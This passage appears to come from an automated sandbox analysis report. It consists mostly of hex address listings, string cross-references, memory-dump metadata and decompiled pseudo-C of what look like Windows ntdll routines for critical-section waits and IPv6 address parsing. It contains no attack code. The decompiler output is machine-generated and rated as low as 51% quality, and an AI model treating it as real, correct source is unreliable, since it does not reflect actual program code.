                                                                                                                                                            0x02232273
                                                                                                                                                            0x02232276
                                                                                                                                                            0x02232279
                                                                                                                                                            0x0223227e
                                                                                                                                                            0x02232283
                                                                                                                                                            0x02232287
                                                                                                                                                            0x0223228a
                                                                                                                                                            0x0223228d
                                                                                                                                                            0x0223228f
                                                                                                                                                            0x022322bc
                                                                                                                                                            0x022322bc
                                                                                                                                                            0x022322bc
                                                                                                                                                            0x022322be
                                                                                                                                                            0x022322c4
                                                                                                                                                            0x022322cc
                                                                                                                                                            0x022322d0
                                                                                                                                                            0x022322d6
                                                                                                                                                            0x022322d7
                                                                                                                                                            0x022322da
                                                                                                                                                            0x022322df
                                                                                                                                                            0x022322e4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022322e6
                                                                                                                                                            0x022322e9
                                                                                                                                                            0x022322f4
                                                                                                                                                            0x022322f9
                                                                                                                                                            0x022322fa
                                                                                                                                                            0x02232305
                                                                                                                                                            0x02232314
                                                                                                                                                            0x02232319
                                                                                                                                                            0x0223231a
                                                                                                                                                            0x0223231d
                                                                                                                                                            0x02232320
                                                                                                                                                            0x02232323
                                                                                                                                                            0x02232323
                                                                                                                                                            0x02232328
                                                                                                                                                            0x0223232d
                                                                                                                                                            0x0223232f
                                                                                                                                                            0x02232331
                                                                                                                                                            0x02232336
                                                                                                                                                            0x02232336
                                                                                                                                                            0x0223233b
                                                                                                                                                            0x0223233d
                                                                                                                                                            0x02232350
                                                                                                                                                            0x02232351
                                                                                                                                                            0x02232356
                                                                                                                                                            0x02232359
                                                                                                                                                            0x02232359
                                                                                                                                                            0x0223235b
                                                                                                                                                            0x0223235d
                                                                                                                                                            0x021f5367
                                                                                                                                                            0x021f536b
                                                                                                                                                            0x021f5372
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02232363
                                                                                                                                                            0x02232363
                                                                                                                                                            0x02232369
                                                                                                                                                            0x0223236a
                                                                                                                                                            0x0223236c
                                                                                                                                                            0x02232371
                                                                                                                                                            0x02232373
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02232379
                                                                                                                                                            0x02232379
                                                                                                                                                            0x0223237a
                                                                                                                                                            0x0223237f
                                                                                                                                                            0x0223237f
                                                                                                                                                            0x02232385
                                                                                                                                                            0x02232386
                                                                                                                                                            0x02232389
                                                                                                                                                            0x0223238e
                                                                                                                                                            0x02232390
                                                                                                                                                            0x021f5378
                                                                                                                                                            0x021f537c
                                                                                                                                                            0x02232396
                                                                                                                                                            0x02232396
                                                                                                                                                            0x02232397
                                                                                                                                                            0x0223239c
                                                                                                                                                            0x022323a2
                                                                                                                                                            0x022323a3
                                                                                                                                                            0x022323a6
                                                                                                                                                            0x022323ab
                                                                                                                                                            0x022323ad
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022323b3
                                                                                                                                                            0x022323b3
                                                                                                                                                            0x022323b4
                                                                                                                                                            0x022323b9
                                                                                                                                                            0x022323ba
                                                                                                                                                            0x022323ba
                                                                                                                                                            0x022323bc
                                                                                                                                                            0x022323bf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02229153
                                                                                                                                                            0x02229158
                                                                                                                                                            0x0222915a
                                                                                                                                                            0x0222915e
                                                                                                                                                            0x02229160
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02229166
                                                                                                                                                            0x02229166
                                                                                                                                                            0x02229171
                                                                                                                                                            0x02229176
                                                                                                                                                            0x02229176
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02229160
                                                                                                                                                            0x022323c6
                                                                                                                                                            0x022323cb
                                                                                                                                                            0x022323d7
                                                                                                                                                            0x022323d7
                                                                                                                                                            0x022323ad
                                                                                                                                                            0x02232390
                                                                                                                                                            0x02232373
                                                                                                                                                            0x0223233f
                                                                                                                                                            0x0223233f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223233f
                                                                                                                                                            0x02232291
                                                                                                                                                            0x02232291
                                                                                                                                                            0x02232293
                                                                                                                                                            0x02232295
                                                                                                                                                            0x0223229a
                                                                                                                                                            0x022322a1
                                                                                                                                                            0x022322a3
                                                                                                                                                            0x022322a7
                                                                                                                                                            0x022322a9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022322ab
                                                                                                                                                            0x022322ad
                                                                                                                                                            0x022322af
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022322af
                                                                                                                                                            0x022322b1
                                                                                                                                                            0x022322b4
                                                                                                                                                            0x022322b4
                                                                                                                                                            0x022322b6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022322b6
                                                                                                                                                            0x0223228f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223226d
                                                                                                                                                            0x021f53cb
                                                                                                                                                            0x021f53ce
                                                                                                                                                            0x021f53d0
                                                                                                                                                            0x021f53d4
                                                                                                                                                            0x021f53d6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f53d8
                                                                                                                                                            0x021f53e3
                                                                                                                                                            0x021f53ea
                                                                                                                                                            0x021f53ea
                                                                                                                                                            0x021f53d6
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022322F4
                                                                                                                                                            Strings
                                                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 022322FC
                                                                                                                                                            • RTL: Re-Waiting, xrefs: 02232328
                                                                                                                                                            • RTL: Resource at %p, xrefs: 0223230B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                            • API String ID: 885266447-871070163
                                                                                                                                                            • Opcode ID: c406b32b12e76be5f93e5dfd67d9afc1f8455365d2592602fa56e92303e13bde
                                                                                                                                                            • Instruction ID: 142490ef021063749e7dfcf1b08d13d78bfc4e4c42957a93bd7de91a2524982d
                                                                                                                                                            • Opcode Fuzzy Hash: c406b32b12e76be5f93e5dfd67d9afc1f8455365d2592602fa56e92303e13bde
                                                                                                                                                            • Instruction Fuzzy Hash: C65118B1650712BBDB25DFA8DC80FA7739AAF54324F114219FD15DB244EB71E8418BA0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                            			E021FEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                            				short _v66;
                                                                                                                                                            				char _v72;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                            				signed int _t40;
                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                            				signed int _t44;
                                                                                                                                                            				void* _t46;
                                                                                                                                                            				intOrPtr _t48;
                                                                                                                                                            				signed int _t49;
                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                            				signed char _t67;
                                                                                                                                                            				void* _t72;
                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                            				intOrPtr* _t80;
                                                                                                                                                            				intOrPtr _t84;
                                                                                                                                                            				intOrPtr* _t85;
                                                                                                                                                            				void* _t91;
                                                                                                                                                            				void* _t92;
                                                                                                                                                            				void* _t93;
                                                                                                                                                            
                                                                                                                                                            				_t80 = __edi;
                                                                                                                                                            				_t75 = __edx;
                                                                                                                                                            				_t70 = __ecx;
                                                                                                                                                            				_t84 = _a4;
                                                                                                                                                            				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                            					E021EDA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                            					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                            				}
                                                                                                                                                            				_push(0);
                                                                                                                                                            				__eflags = _t38 - 0xffffffff;
                                                                                                                                                            				if(_t38 == 0xffffffff) {
                                                                                                                                                            					_t39 =  *0x22b793c; // 0x0
                                                                                                                                                            					_push(0);
                                                                                                                                                            					_push(_t84);
                                                                                                                                                            					_t40 = E021D16C0(_t39);
                                                                                                                                                            				} else {
                                                                                                                                                            					_t40 = E021CF9D4(_t38);
                                                                                                                                                            				}
                                                                                                                                                            				_pop(_t85);
                                                                                                                                                            				__eflags = _t40;
                                                                                                                                                            				if(__eflags < 0) {
                                                                                                                                                            					_push(_t40);
                                                                                                                                                            					E02213915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                            					asm("int3");
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L21:
                                                                                                                                                            						_t76 =  *[fs:0x18];
                                                                                                                                                            						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                            						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                            						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                            							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                            							_v66 = 0x1722;
                                                                                                                                                            							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                            							_t76 =  &_v72;
                                                                                                                                                            							_push( &_v72);
                                                                                                                                                            							_v28 = _t85;
                                                                                                                                                            							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                            							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                            							_push(0x10);
                                                                                                                                                            							_push(0x20402);
                                                                                                                                                            							E021D01A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                            						}
                                                                                                                                                            						while(1) {
                                                                                                                                                            							_t43 = _v8;
                                                                                                                                                            							_push(_t80);
                                                                                                                                                            							_push(0);
                                                                                                                                                            							__eflags = _t43 - 0xffffffff;
                                                                                                                                                            							if(_t43 == 0xffffffff) {
                                                                                                                                                            								_t71 =  *0x22b793c; // 0x0
                                                                                                                                                            								_push(_t85);
                                                                                                                                                            								_t44 = E021D1F28(_t71);
                                                                                                                                                            							} else {
                                                                                                                                                            								_t44 = E021CF8CC(_t43);
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t44 - 0x102;
                                                                                                                                                            							if(_t44 != 0x102) {
                                                                                                                                                            								__eflags = _t44;
                                                                                                                                                            								if(__eflags < 0) {
                                                                                                                                                            									_push(_t44);
                                                                                                                                                            									E02213915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                            									asm("int3");
                                                                                                                                                            									E02252306(_t85);
                                                                                                                                                            									__eflags = _t67 & 0x00000002;
                                                                                                                                                            									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                            										_t7 = _t67 + 2; // 0x4
                                                                                                                                                            										_t72 = _t7;
                                                                                                                                                            										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                            										__eflags = _t67 - _t67;
                                                                                                                                                            										if(_t67 == _t67) {
                                                                                                                                                            											E021FEC56(_t72, _t76, _t80, _t85);
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            									return 0;
                                                                                                                                                            								} else {
                                                                                                                                                            									__eflags = _v24;
                                                                                                                                                            									if(_v24 != 0) {
                                                                                                                                                            										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                            									}
                                                                                                                                                            									return 2;
                                                                                                                                                            								}
                                                                                                                                                            								goto L36;
                                                                                                                                                            							}
                                                                                                                                                            							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                            							_push(_t67);
                                                                                                                                                            							_t46 = E02214FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                            							_push(_t77);
                                                                                                                                                            							E02223F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                            							_t48 =  *_t85;
                                                                                                                                                            							_t92 = _t91 + 0x18;
                                                                                                                                                            							__eflags = _t48 - 0xffffffff;
                                                                                                                                                            							if(_t48 == 0xffffffff) {
                                                                                                                                                            								_t49 = 0;
                                                                                                                                                            								__eflags = 0;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                            							}
                                                                                                                                                            							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                            							_push(_t49);
                                                                                                                                                            							_t50 = _v12;
                                                                                                                                                            							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                            							_push(_t85);
                                                                                                                                                            							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                            							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                            							E02223F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                            							_t53 =  *_t85;
                                                                                                                                                            							_t93 = _t92 + 0x20;
                                                                                                                                                            							_t67 = _t67 + 1;
                                                                                                                                                            							__eflags = _t53 - 0xffffffff;
                                                                                                                                                            							if(_t53 != 0xffffffff) {
                                                                                                                                                            								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                            								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t67 - 2;
                                                                                                                                                            							if(_t67 > 2) {
                                                                                                                                                            								__eflags = _t85 - 0x22b20c0;
                                                                                                                                                            								if(_t85 != 0x22b20c0) {
                                                                                                                                                            									_t76 = _a4;
                                                                                                                                                            									__eflags = _a4 - _a8;
                                                                                                                                                            									if(__eflags == 0) {
                                                                                                                                                            										E0225217A(_t71, __eflags, _t85);
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							_push("RTL: Re-Waiting\n");
                                                                                                                                                            							_push(0);
                                                                                                                                                            							_push(0x65);
                                                                                                                                                            							_a8 = _a4;
                                                                                                                                                            							E02223F92();
                                                                                                                                                            							_t91 = _t93 + 0xc;
                                                                                                                                                            							__eflags =  *0x7ffe0382;
                                                                                                                                                            							if( *0x7ffe0382 != 0) {
                                                                                                                                                            								goto L21;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						goto L36;
                                                                                                                                                            					}
                                                                                                                                                            				} else {
                                                                                                                                                            					return _t40;
                                                                                                                                                            				}
                                                                                                                                                            				L36:
                                                                                                                                                            			}

































                                                                                                                                                            0x021fec56
                                                                                                                                                            0x021fec56
                                                                                                                                                            0x021fec56
                                                                                                                                                            0x021fec5c
                                                                                                                                                            0x021fec64
                                                                                                                                                            0x022323e6
                                                                                                                                                            0x022323eb
                                                                                                                                                            0x022323eb
                                                                                                                                                            0x021fec6a
                                                                                                                                                            0x021fec6c
                                                                                                                                                            0x021fec6f
                                                                                                                                                            0x022323f3
                                                                                                                                                            0x022323f8
                                                                                                                                                            0x022323fa
                                                                                                                                                            0x022323fc
                                                                                                                                                            0x021fec75
                                                                                                                                                            0x021fec76
                                                                                                                                                            0x021fec76
                                                                                                                                                            0x021fec7b
                                                                                                                                                            0x021fec7c
                                                                                                                                                            0x021fec7e
                                                                                                                                                            0x02232406
                                                                                                                                                            0x02232407
                                                                                                                                                            0x0223240c
                                                                                                                                                            0x0223240d
                                                                                                                                                            0x0223240d
                                                                                                                                                            0x0223240d
                                                                                                                                                            0x02232414
                                                                                                                                                            0x02232417
                                                                                                                                                            0x0223241e
                                                                                                                                                            0x02232435
                                                                                                                                                            0x02232438
                                                                                                                                                            0x0223243c
                                                                                                                                                            0x0223243f
                                                                                                                                                            0x02232442
                                                                                                                                                            0x02232443
                                                                                                                                                            0x02232446
                                                                                                                                                            0x02232449
                                                                                                                                                            0x02232453
                                                                                                                                                            0x02232455
                                                                                                                                                            0x0223245b
                                                                                                                                                            0x0223245b
                                                                                                                                                            0x021feb99
                                                                                                                                                            0x021feb99
                                                                                                                                                            0x021feb9c
                                                                                                                                                            0x021feb9d
                                                                                                                                                            0x021feb9f
                                                                                                                                                            0x021feba2
                                                                                                                                                            0x02232465
                                                                                                                                                            0x0223246b
                                                                                                                                                            0x0223246d
                                                                                                                                                            0x021feba8
                                                                                                                                                            0x021feba9
                                                                                                                                                            0x021feba9
                                                                                                                                                            0x021febae
                                                                                                                                                            0x021febb3
                                                                                                                                                            0x021febb9
                                                                                                                                                            0x021febbb
                                                                                                                                                            0x02232513
                                                                                                                                                            0x02232514
                                                                                                                                                            0x02232519
                                                                                                                                                            0x0223251b
                                                                                                                                                            0x021fec2a
                                                                                                                                                            0x021fec2d
                                                                                                                                                            0x021fec33
                                                                                                                                                            0x021fec36
                                                                                                                                                            0x021fec3a
                                                                                                                                                            0x021fec3e
                                                                                                                                                            0x021fec40
                                                                                                                                                            0x021fec47
                                                                                                                                                            0x021fec47
                                                                                                                                                            0x021fec40
                                                                                                                                                            0x021d22c6
                                                                                                                                                            0x021febc1
                                                                                                                                                            0x021febc1
                                                                                                                                                            0x021febc5
                                                                                                                                                            0x021fec9a
                                                                                                                                                            0x021fec9a
                                                                                                                                                            0x021febd6
                                                                                                                                                            0x021febd6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021febbb
                                                                                                                                                            0x02232477
                                                                                                                                                            0x0223247c
                                                                                                                                                            0x02232486
                                                                                                                                                            0x0223248b
                                                                                                                                                            0x02232496
                                                                                                                                                            0x0223249b
                                                                                                                                                            0x0223249d
                                                                                                                                                            0x022324a0
                                                                                                                                                            0x022324a3
                                                                                                                                                            0x022324aa
                                                                                                                                                            0x022324aa
                                                                                                                                                            0x022324a5
                                                                                                                                                            0x022324a5
                                                                                                                                                            0x022324a5
                                                                                                                                                            0x022324ac
                                                                                                                                                            0x022324af
                                                                                                                                                            0x022324b0
                                                                                                                                                            0x022324b3
                                                                                                                                                            0x022324b9
                                                                                                                                                            0x022324ba
                                                                                                                                                            0x022324bb
                                                                                                                                                            0x022324c6
                                                                                                                                                            0x022324cb
                                                                                                                                                            0x022324cd
                                                                                                                                                            0x022324d0
                                                                                                                                                            0x022324d1
                                                                                                                                                            0x022324d4
                                                                                                                                                            0x022324d6
                                                                                                                                                            0x022324d9
                                                                                                                                                            0x022324d9
                                                                                                                                                            0x022324dc
                                                                                                                                                            0x022324df
                                                                                                                                                            0x022324e1
                                                                                                                                                            0x022324e7
                                                                                                                                                            0x022324e9
                                                                                                                                                            0x022324ec
                                                                                                                                                            0x022324ef
                                                                                                                                                            0x022324f2
                                                                                                                                                            0x022324f2
                                                                                                                                                            0x022324ef
                                                                                                                                                            0x022324e7
                                                                                                                                                            0x022324fa
                                                                                                                                                            0x022324ff
                                                                                                                                                            0x02232501
                                                                                                                                                            0x02232503
                                                                                                                                                            0x02232506
                                                                                                                                                            0x0223250b
                                                                                                                                                            0x021feb8c
                                                                                                                                                            0x021feb93
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021feb93
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021feb99
                                                                                                                                                            0x021fec85
                                                                                                                                                            0x021fec85
                                                                                                                                                            0x021fec85
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0223248D
                                                                                                                                                            • RTL: Re-Waiting, xrefs: 022324FA
                                                                                                                                                            • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 022324BD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                            • API String ID: 0-3177188983
                                                                                                                                                            • Opcode ID: 9f510e41d4062b69817b758a7a1c18bc92591b07a37116183dab6aac376b92aa
                                                                                                                                                            • Instruction ID: fd9c4945d3a2afda7b3c975607d95d0a0b64a98783da9ddad7fd73bb098ed534
                                                                                                                                                            • Opcode Fuzzy Hash: 9f510e41d4062b69817b758a7a1c18bc92591b07a37116183dab6aac376b92aa
                                                                                                                                                            • Instruction Fuzzy Hash: 8241C2B0650305FFDB24DBA8DC88F6A77AAAF44720F108605FA699B2D4D734E941CB61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E0220FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _t105;
                                                                                                                                                            				void* _t110;
                                                                                                                                                            				char _t114;
                                                                                                                                                            				short _t115;
                                                                                                                                                            				void* _t118;
                                                                                                                                                            				signed short* _t119;
                                                                                                                                                            				short _t120;
                                                                                                                                                            				char _t122;
                                                                                                                                                            				void* _t127;
                                                                                                                                                            				void* _t130;
                                                                                                                                                            				signed int _t136;
                                                                                                                                                            				intOrPtr _t143;
                                                                                                                                                            				signed int _t158;
                                                                                                                                                            				signed short* _t164;
                                                                                                                                                            				signed int _t167;
                                                                                                                                                            				void* _t170;
                                                                                                                                                            
                                                                                                                                                            				_t158 = 0;
                                                                                                                                                            				_t164 = _a4;
                                                                                                                                                            				_v20 = 0;
                                                                                                                                                            				_v24 = 0;
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				_v12 = 0;
                                                                                                                                                            				_v16 = 0;
                                                                                                                                                            				_v28 = 0;
                                                                                                                                                            				_t136 = 0;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                            					if(_t167 == _t158) {
                                                                                                                                                            						break;
                                                                                                                                                            					}
                                                                                                                                                            					_t118 = _v20 - _t158;
                                                                                                                                                            					if(_t118 == 0) {
                                                                                                                                                            						if(_t167 == 0x3a) {
                                                                                                                                                            							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                            								break;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t119 =  &(_t164[1]);
                                                                                                                                                            								if( *_t119 != _t167) {
                                                                                                                                                            									break;
                                                                                                                                                            								}
                                                                                                                                                            								_t143 = 2;
                                                                                                                                                            								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                            								_v28 = 1;
                                                                                                                                                            								_v8 = _t143;
                                                                                                                                                            								_t136 = _t136 + 1;
                                                                                                                                                            								L47:
                                                                                                                                                            								_t164 = _t119;
                                                                                                                                                            								_v20 = _t143;
                                                                                                                                                            								L14:
                                                                                                                                                            								if(_v24 == _t158) {
                                                                                                                                                            									L19:
                                                                                                                                                            									_t164 =  &(_t164[1]);
                                                                                                                                                            									_t158 = 0;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            								if(_v12 == _t158) {
                                                                                                                                                            									if(_v16 > 4) {
                                                                                                                                                            										L29:
                                                                                                                                                            										return 0xc000000d;
                                                                                                                                                            									}
                                                                                                                                                            									_t120 = E0220EE02(_v24, _t158, 0x10);
                                                                                                                                                            									_t170 = _t170 + 0xc;
                                                                                                                                                            									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                            									_t136 = _t136 + 1;
                                                                                                                                                            									goto L19;
                                                                                                                                                            								}
                                                                                                                                                            								if(_v16 > 3) {
                                                                                                                                                            									goto L29;
                                                                                                                                                            								}
                                                                                                                                                            								_t122 = E0220EE02(_v24, _t158, 0xa);
                                                                                                                                                            								_t170 = _t170 + 0xc;
                                                                                                                                                            								if(_t122 > 0xff) {
                                                                                                                                                            									goto L29;
                                                                                                                                                            								}
                                                                                                                                                            								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                            								goto L19;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L21:
                                                                                                                                                            						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                            							break;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(E0220685D(_t167, 4) == 0) {
                                                                                                                                                            								if(E0220685D(_t167, 0x80) != 0) {
                                                                                                                                                            									if(_v12 > 0) {
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									_t127 = 1;
                                                                                                                                                            									_a7 = 1;
                                                                                                                                                            									_v24 = _t164;
                                                                                                                                                            									_v20 = 1;
                                                                                                                                                            									_v16 = 1;
                                                                                                                                                            									L36:
                                                                                                                                                            									if(_v20 == _t127) {
                                                                                                                                                            										goto L19;
                                                                                                                                                            									}
                                                                                                                                                            									_t158 = 0;
                                                                                                                                                            									goto L14;
                                                                                                                                                            								}
                                                                                                                                                            								break;
                                                                                                                                                            							}
                                                                                                                                                            							_a7 = 0;
                                                                                                                                                            							_v24 = _t164;
                                                                                                                                                            							_v20 = 1;
                                                                                                                                                            							_v16 = 1;
                                                                                                                                                            							goto L19;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_t130 = _t118 - 1;
                                                                                                                                                            					if(_t130 != 0) {
                                                                                                                                                            						if(_t130 == 1) {
                                                                                                                                                            							goto L21;
                                                                                                                                                            						}
                                                                                                                                                            						_t127 = 1;
                                                                                                                                                            						goto L36;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t167 >= 0x80) {
                                                                                                                                                            						L7:
                                                                                                                                                            						if(_t167 == 0x3a) {
                                                                                                                                                            							_t158 = 0;
                                                                                                                                                            							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                            								break;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t119 =  &(_t164[1]);
                                                                                                                                                            								if( *_t119 != _t167) {
                                                                                                                                                            									_v8 = _v8 + 1;
                                                                                                                                                            									L13:
                                                                                                                                                            									_v20 = _t158;
                                                                                                                                                            									goto L14;
                                                                                                                                                            								}
                                                                                                                                                            								if(_v28 != 0) {
                                                                                                                                                            									break;
                                                                                                                                                            								}
                                                                                                                                                            								_v28 = _v8 + 1;
                                                                                                                                                            								_t143 = 2;
                                                                                                                                                            								_v8 = _v8 + _t143;
                                                                                                                                                            								goto L47;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                            							break;
                                                                                                                                                            						} else {
                                                                                                                                                            							_v12 = _v12 + 1;
                                                                                                                                                            							_t158 = 0;
                                                                                                                                                            							goto L13;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					if(E0220685D(_t167, 4) != 0) {
                                                                                                                                                            						_v16 = _v16 + 1;
                                                                                                                                                            						goto L19;
                                                                                                                                                            					}
                                                                                                                                                            					if(E0220685D(_t167, 0x80) != 0) {
                                                                                                                                                            						_v16 = _v16 + 1;
                                                                                                                                                            						if(_v12 > 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						_a7 = 1;
                                                                                                                                                            						goto L19;
                                                                                                                                                            					}
                                                                                                                                                            					goto L7;
                                                                                                                                                            				}
                                                                                                                                                            				 *_a8 = _t164;
                                                                                                                                                            				if(_v12 != 0) {
                                                                                                                                                            					if(_v12 != 3) {
